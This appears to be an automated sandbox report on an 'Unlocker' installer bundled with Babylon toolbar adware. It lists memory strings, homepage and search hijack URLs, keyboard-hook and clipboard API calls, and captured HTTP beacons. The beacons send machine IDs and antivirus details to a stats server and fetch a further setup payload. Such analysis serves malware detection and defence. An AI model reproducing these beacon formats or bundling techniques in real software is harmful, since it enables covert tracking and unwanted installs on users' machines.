Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://utils.babylon.com/country/
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://utils.babylon.com/country/S7
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/lingoz-redirect
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/client.cgi?
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/download.cgi?
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/purchase.cgi?
Source: Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/purchase.cgi??
Source: Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?
Source: Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?b
Source: Setup.exeString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?no_policy=1&type=%s&lang=%d
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?no_policy=1&type=%s&lang=%d9.1.1.10HPTBDSPukieffcrver=&&m
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360676354.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358228779.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358133429.000000000238C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 
00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=babylon6_full_text
Source: Setup.exe, 00000002.00000002.360676354.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358228779.0000000002393000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358133429.000000000238C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 
00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=babylon6_full_texthy
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=getting_started&lang=$
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 
00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=machinetrans
Source: Setup.exe, 00000002.00000003.358323085.000000000236F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=machinetrans3
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drString found in binary or memory: http://www.babylon.com/redirects/redir.cgi?type=post_install_page&lang=$
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358181176.000000000236E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358323085.000000000236F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.my-online-search.com&babsrc=SP_ofln&mntrId=&dlb=%d&babsrc=SP_def&NT_HP_TB_SP_My
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/9.2.exerefox
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_def&/?q=
Source: Setup.exe, 00000002.00000002.360644771.0000000002387000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358686150.0000000002386000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357844103.0000000002381000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588
Source: Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358551623.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357867781.0000000002371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360615970.000000000237C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358204631.0000000002372000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358754148.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=1224711588
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471dat
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471t
Source: Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471tml
Source: Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.my-online-search.com/?q=
Source: DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drString found in binary or memory: http://www.my-online-search.comhttp://www.my-online-search.com/?babsrc=HP_ofln&mntrId=&dlb=%dhome&?/
Source: Setup.exe, 00000002.00000002.361089994.00000000037B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknownDNS traffic detected: queries for: stat.info-stream.net
Source: global trafficHTTP traffic detected: GET /report.php?no_policy=1&lang=0&source=setup-start&stage=0&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0 HTTP/1.1User-Agent: BabylonHost: stat.info-stream.netCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /downloader.php?ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&lang=en&zpb=1&geo=1 HTTP/1.1User-Agent: BabylonHost: stp.babylon.comConnection: Keep-AliveCookie: affilID=122471
Source: global trafficHTTP traffic detected: GET /site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb HTTP/1.1User-Agent: BabylonHost: dl.babylon.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affilID=122471&guid={AB9CC252-CABB-4562-BE9F-5C103C6D7C77}&mntrId=C839ECF4BBEA1588&moldid=c839d64e000000000000ecf4bbea1588&sufn=Unlocker1.9.2.exe&iev=11&ffv=0&crv=104&dwb=cr&dlb=ie&wbr=1&ibprs=NA&ibprv=0&sutp=50&sufl=66&tbp=0&prver=0&minreq=0&dtct=-10000000&wvr=602&avr=V2luZG93cyBEZWZlbmRlcg==&tbtp=def&tbinst=1&w64=1&cntry=US&cat=delta&uac=1&osp=hp0:-1938492880;hp1:0;hp2:0;dsp0:-886302982;dsp1:0;dsp2:0;&dnt=2.0,3.0,3.5,4.0&hp=1&dsp=1&tb=1&hpx=0&dspx=0&rvrt=0&excd=0&stm=2&nvs=0&dnld=100&dcnt=1&dtot=1&dlerr=200&dltm=0&dlsz=3844&dsflr=0&errurl=Setup2.zpb&hpc=1998245871&spc=1998245871&tbx=0 HTTP/1.1User-Agent: BabylonHost: stat.info-stream.netCache-Control: no-cache

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Temp\8A431A81-BAB0-7891-9C65-69A9AC1B2A54\Setup.exeCode function: 2_2_004C8C80 SetWindowsHookExW 00000002,004C8BE0,00000000,000000002_2_004C8C80
Source: Unlocker1.9.2.exe, 00000000.00000002.373817613.000000000071A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\Unlocker1.9.2.exeCode function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EB9
